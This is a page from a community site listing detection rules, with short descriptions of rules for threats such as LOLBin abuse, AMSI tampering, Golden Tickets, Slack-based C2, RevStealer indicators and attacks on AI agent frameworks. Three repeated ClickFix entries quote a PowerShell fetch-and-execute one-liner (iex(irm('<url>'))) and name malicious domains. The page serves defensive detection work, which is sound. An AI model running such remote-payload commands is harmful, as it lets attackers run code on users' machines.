Detections

Explore public detection logic contributed by the community across SIEM and rule languages.

39,252 detections

Detects anomalous, high-volume HTTP requests to AI agent orchestration endpoints (e.g., tool invocation, plugins, or webhooks) followed by suspicious process execution or outbound network connections from the same host. This behavior is indicative of RCE exploitation against an AI agent framework, such as insecure deserialization or SSRF within a plugin connector.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
9 days ago
000
Detects the presence of a specific, hardcoded Ed25519 public key associated with malicious cross-platform payloads (npm, Go modules, Terraform providers) that use Slack for C2 communication.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
003
Detects the creation of scheduled tasks, recurring jobs, or webhook subscriptions by a user identity flagged as an AI_AGENT. This activity is monitored for persistence, especially when the event lacks a descriptive context or targets external networks, suggesting potential unauthorized agent behavioral drift or malicious persistence.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
9 days ago
000
Detects suspicious network connectivity where a newly executed process (that is not a browser or Slack) immediately establishes an outbound HTTPS connection to the Slack API. This behavior is indicative of potential malware implants or malicious scripts attempting to perform system reconnaissance and check-in to an attacker-controlled Slack workspace.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
303
This rule detects the suspicious use of signed Windows binaries (rundll32.exe, regsvr32.exe, mshta.exe, msiexec.exe) to execute remote content via URLs or scripts, or when triggered by common office applications and browsers. This behavior is often indicative of living-off-the-land (LotL) techniques used for download/execution of payloads or bypassing security controls.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
303
Detects attempts to bypass or tamper with the Antimalware Scan Interface (AMSI). This rule monitors for command-line arguments indicative of reflection-based patching of AmsiUtils and forced AmsiScanBuffer failures, as well as registry modifications to AMSI providers.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
003
Detects the execution of PowerShell with suspicious command-line patterns indicative of obfuscation or malicious intent, including encoded commands, Base64 decoding, IEX combined with common download cmdlets, and specific obfuscation techniques like backtick concatenation, character casting, or variable concatenation.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
203
Detects anomalous Kerberos ticket requests that are characteristic of Golden Ticket attacks. The rule flags the use of weak encryption types (e.g., RC4) commonly used in forged tickets even in AES-enforced environments, and direct requests for the KRBTGT service account outside of legitimate ticket renewal operations.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
503
Detects the execution of known Living-off-the-Land Binaries (LOLBins) such as mshta, certutil, regsvr32, rundll32, and msiexec, where the command-line arguments contain suspicious patterns indicative of script execution or remote file fetching. These behaviors are consistent with T1218 (System Binary Proxy Execution) to bypass security controls by utilizing trusted, signed binaries to execute malicious code.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
103
This rule detects potential Kerberos Golden Ticket activity by monitoring Windows Event IDs 4768 (TGT Request) and 4769 (TGS Request) for indicators of forgery. Specifically, it flags TGT requests that utilize RC4 encryption ('0x17') in environments where AES is expected, excluding standard krbtgt account activity.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
103
This rule detects the creation of services or execution of processes associated with remote management tools like PsExec or PAExec. It looks for common service names (PSEXESVC, PAExec), suspicious executable paths in temporary directories (e.g., \Temp\, \AppData\Local\Temp\), or command-line patterns indicating remote execution via ADMIN$ shares. These indicators are frequently used by adversaries for lateral movement and remote command execution.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
203
Detects instances where the system DNS process (dns.exe) on a domain controller performs recursive DNS resolution towards a set of external IP addresses associated with suspicious infrastructure (AS202412). The rule correlates this activity with recent network connections from common web browsers or system utilities (msedge.exe, svchost.exe) on the same host to identify potential proxying of malicious DNS queries.
avatar
Ankit Mehta@Secvyn
avatar
Hunters
15 days ago
003
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Detection & Hunting Community
15 days ago
003
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Hunters
15 days ago
003
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
Defender - KQL
15 days ago
003
Sweeps DeviceFileEvents, DeviceProcessEvents, and DeviceNetworkEvents over a rolling 30-day window for known RevStealer indicators: exact SHA-256 matches against all 13 published file hashes, and exact-host matches (via parsed URL host, not substring) against the confirmed C2 domain meta7.archscreen68.one. An empty, extensible IP list is included for when a malicious IP is published.
avatar
Arnold Chan@slaz
avatar
Midnight Slayer
17 days ago
205
Sweeps DeviceFileEvents, DeviceProcessEvents, and DeviceNetworkEvents over a rolling 30-day window for known RevStealer indicators: exact SHA-256 matches against all 13 published file hashes, and exact-host matches (via parsed URL host, not substring) against the confirmed C2 domain meta7.archscreen68.one. An empty, extensible IP list is included for when a malicious IP is published.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
17 days ago
005
Detects instances where machine learning runtime processes (e.g., Python, torch-model-loader) load serialized model files (e.g., .pkl, .joblib, .pth) and subsequently spawn suspicious child processes like command shells, scripting engines, or download utilities. This behavior is indicative of arbitrary code execution via unsafe deserialization of a malicious model artifact.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
13 days ago
002
Detects high-volume outbound transfers of sensitive machine learning artifacts, such as model files, training datasets, and model registries, to unauthorized external destinations like personal email or unmanaged cloud storage. This behavior is indicative of potential intellectual property theft.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
13 days ago
002
Detects the execution of known Remote Monitoring and Management (RMM) tool binaries (ScreenConnect, AnyDesk, Atera) that are initiated by suspicious parent processes such as browsers, scripting hosts, or office applications, or run from non-standard locations. This behavior is indicative of threat actors deploying trojanized RMM tools to establish a covert command-and-control channel that blends into normal IT administrative traffic.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
12 days ago
001
Detects suspicious cross-process access (Sysmon Event ID 10) and remote thread creation (Sysmon Event ID 8) targeting sensitive processes such as lsass.exe, svchost.exe, and explorer.exe, which are indicative of process injection or hollowing techniques used for evasion or persistence.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
12 days ago
001
Page 93 of 1870